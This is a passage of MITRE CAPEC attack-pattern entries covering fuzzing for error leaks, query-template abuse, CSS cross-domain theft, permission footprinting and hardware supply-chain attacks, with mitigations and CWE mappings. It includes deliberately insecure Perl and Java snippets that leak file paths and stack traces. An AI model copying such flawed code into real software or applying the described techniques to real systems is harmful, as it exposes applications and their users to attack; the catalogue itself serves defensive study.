If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials.

Prerequisites

The target application must fail to sanitize incoming messages adequately before processing.

Skills Required

[Level: Medium]

Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.

Resources Required

Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.

Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.

Implementation: Obfuscate server fields of HTTP response.

Implementation: Hide inner ordering of HTTP response header.

Implementation: Customizing HTTP error codes such as 404 or 500.

Implementation: Hide HTTP response header software information filed.

Implementation: Hide cookie's software information filed.

Implementation: Obfuscate database type in Database API's error message.

Example Instances

The following code generates an error message that leaks the full pathname of the configuration file.

$ConfigDir = "/home/myprog/config";
$uname = GetUserInput("username");
ExitError("Bad hacker!") if ($uname !~ /^\w+$/);
$file = "$ConfigDir/$uname.txt";
if (! (-e $file)) { ExitError("Error: $file does not exist"); }
...

If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.

In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.

public void httpGet(HttpServletRequest request, HttpServletResponse response) {

try {

processRequest();

} catch (Exception ex) {

ex.printStackTrace(response.getWriter());

return;

}

If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing.

Related Weaknesses

CWE-ID	Weakness Name
209	Generation of Error Message Containing Sensitive Information
532	Insertion of Sensitive Information into Log File

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	Fuzzing and observing application log data/errors for application mapping

CAPEC-261: Fuzzing for garnering other adjacent user/sensitive data

Attack Pattern ID: 261

Abstraction: Detailed

View customized information:

Description

Extended Description

Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. If the server does not verify that the query matches one of the expected templates, an adversary who is allowed to send normal queries could modify their query to try to return additional information. The adversary may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	54	Query System for Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

Techniques
Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

Techniques
Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.

Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that either provide user/sensitive data or give information about an expected template that could be used to produce this data.

Exploit

Craft exploit payloads: If the logs did not reveal any user/sensitive data, an adversary will attempt to make the fuzzing inputs form to an expected template

Techniques
Create variants of expected templates that request additional information
Create variants that exclude limiting clauses
Create variants that alter fields taht identify the requester in order to subvert access controls
Repeat different fuzzing variants until sensitive information is divulged

Prerequisites

The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates.

Resources Required

The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries.

Example Instances

A client that queries an employee database might have templates such that the user only supplies the target's name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. For this example, additional information might include social security numbers or salaries.

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-468: Generic Cross-Browser Cross-Domain Theft

Attack Pattern ID: 468

Abstraction: Standard

View customized information:

Description

Extended Description

By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that "does not make sense". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

No new lines can be present in the injected CSS stringProper HTML or URL escaping of the " and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string

Skills Required

[Level: High]

Ability to craft a CSS injection

Resources Required

Attacker controlled site/page to render a page referencing the injected CSS string

Mitigations

Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.

Implementation: Perform proper HTML encoding and URL escaping

Related Weaknesses

CWE-ID	Weakness Name
707	Improper Neutralization
149	Improper Neutralization of Quoting Syntax
177	Improper Handling of URL Encoding (Hex Encoding)
838	Inappropriate Encoding for Output Context

References

[REF-405] Chris Evans. "Generic cross-browser cross-domain theft". 2009-12-28. <http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-576: Group Permission Footprinting

Attack Pattern ID: 576

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Identify programs (such as "net") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1069	Permission Groups Discovery
1615	Group Policy Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-531: Hardware Component Substitution

Attack Pattern ID: 531

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	534	Malicious Hardware Update
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	530	Provide Counterfeit Component
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	535	Malicious Gray Market Hardware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Physical access to the system or the integration facility where hardware components are kept.

Skills Required

[Level: High]

Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts.

Example Instances

An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Hardware Component Substitution After Installation

CAPEC-516: Hardware Component Substitution During Baselining

Attack Pattern ID: 516

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production

Prerequisites

The adversary will need either physical access or be able to supply malicious hardware components to the product development facility.

Skills Required

[Level: Medium]

Intelligence data on victim's purchasing habits.

[Level: High]

Resources to maliciously construct/alter hardware components used for testing by the supplier.

[Level: High]

Resources to physically infiltrate supplier.

Mitigations

Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.

Example Instances

An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Mitigations, Prerequisites, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-521: Hardware Design Specifications Are Altered

Attack Pattern ID: 521

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

Advanced knowledge of hardware capabilities of a manufacturer's product.

Access to the manufacturer's documentation.

Skills Required

[Level: High]

Ability to read, interpret, and subsequently alter manufacturer's documentation to cause errors in design specifications.

[Level: High]

Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.

Mitigations

Digitize documents and cryptographically sign them to verify authenticity.

Password protect documents and make them read-only for unauthorized users.

Avoid emailing important documents and configurations.

Ensure deleted files are actually deleted.

Maintain backups of the document for recovery and verification.

Separate need-to-know information from system configuration information depending on the user.

Example Instances

To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 "cores" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-715] Marie Prokopets. "How To Secure Your Documents". Nira. <https://nira.com/how-to-secure-your-documents/>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References

CAPEC-624: Hardware Fault Injection

Attack Pattern ID: 624

Abstraction: Meta

View customized information:

Description

Alternate Terms

Term: Side-Channel Attack

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	625	Mobile Device Fault Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

Physical access to the system

The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation.

Skills Required

[Level: High]

Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required.

Resources Required

The relevant sensors and tools to detect and analyze fault/side-channel data from a system.

A tool capable of injecting fault/side-channel data into a system or application.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data Bypass Protection Mechanism Hide Activities
Integrity	Execute Unauthorized Commands

Mitigations

Implement robust physical security countermeasures and monitoring.

Related Weaknesses

CWE-ID	Weakness Name
1247	Improper Protection Against Voltage and Clock Glitches
1248	Semiconductor Defects in Hardware Logic with Security-Sensitive Implications
1256	Improper Restriction of Software Interfaces to Hardware Features
1319	Improper Protection against Electromagnetic Fault Injection (EM-FI)
1332	Improper Handling of Faults that Lead to Instruction Skips
1334	Unauthorized Error Injection Can Degrade Hardware Redundancy
1338	Improper Protections Against Hardware Overheating
1351	Improper Handling of Hardware Behavior in Exceptionally Cold Environments

Notes

Other

Considerable effort on the part of the adversary is often required in order to detect and analyze fault/side channel data.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Alternate_Terms, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Other_Notes, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Consequences, Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2020-07-30 (Version 3.3)	Fault Injection

CAPEC-440: Hardware Integrity Attack

Attack Pattern ID: 440

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	401	Physically Hacking Hardware
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	534	Malicious Hardware Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Influence over the deployed system at a victim location.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain
1200	Hardware Additions

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, Examples-Instances, References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Description, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Integrity Modification During Deployed Use

CAPEC-383: Harvesting Information via API Event Monitoring

Attack Pattern ID: 383

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Prerequisites

The target software is utilizing application framework APIs

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.

Related Weaknesses

CWE-ID	Weakness Name
311	Missing Encryption of Sensitive Data
319	Cleartext Transmission of Sensitive Information
419	Unprotected Primary Channel
602	Client-Side Enforcement of Server-Side Security

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1056.004	Input Capture: Credential API Hooking

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Resources_Required
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Harvesting Usernames or UserIDs via Application API Event Monitoring

CAPEC-636: Hiding Malicious Data or Code within Files

Attack Pattern ID: 636

Abstraction: Standard

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	35	Leverage Executable Code in Non-Executable Files
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	168	Windows ::DATA Alternate Data Stream

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The operating system must support a file system that allows for alternate data storage for a file.

Mitigations

Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.

Related Weaknesses

CWE-ID	Weakness Name
506	Embedded Malicious Code

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1001.002	Data Obfuscation: Steganography
